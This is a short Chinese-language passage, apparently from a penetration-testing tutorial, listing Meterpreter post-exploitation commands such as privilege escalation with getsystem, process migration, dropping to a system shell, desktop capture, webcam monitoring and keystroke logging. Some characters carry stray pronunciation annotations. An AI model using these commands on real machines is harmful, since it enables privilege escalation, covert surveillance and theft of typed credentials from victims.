接。另外，附meterpreter常用命令：getsystem#會(huì)自動(dòng)利用各種各樣的系統(tǒng)漏洞來進(jìn)行權(quán)限提升migrate#進(jìn)程id進(jìn)程遷移background#把當(dāng)前的會(huì)話設(shè)置為背景，需要的時(shí)候在啟用getuid#查看對(duì)方正在運(yùn)行的用戶ps#列出所有的進(jìn)程getpid#返回運(yùn)行meterpreter的id號(hào)sysinfo#產(chǎn)看系統(tǒng)信息和體系結(jié)構(gòu)shell#切換到cmd的系統(tǒng)權(quán)限方式exit#退出shell會(huì)話返回meterpreter或終止meterpretergetdesktop截取目標(biāo)主機(jī)當(dāng)前桌面會(huì)話窗口runwebcam-p/var/www#在/var/www目錄監(jiān)控目標(biāo)主機(jī)的攝像頭keylog_recorder#使用migrate將會(huì)話遷移至explorer.exe的進(jìn)程空間后記錄鍵盤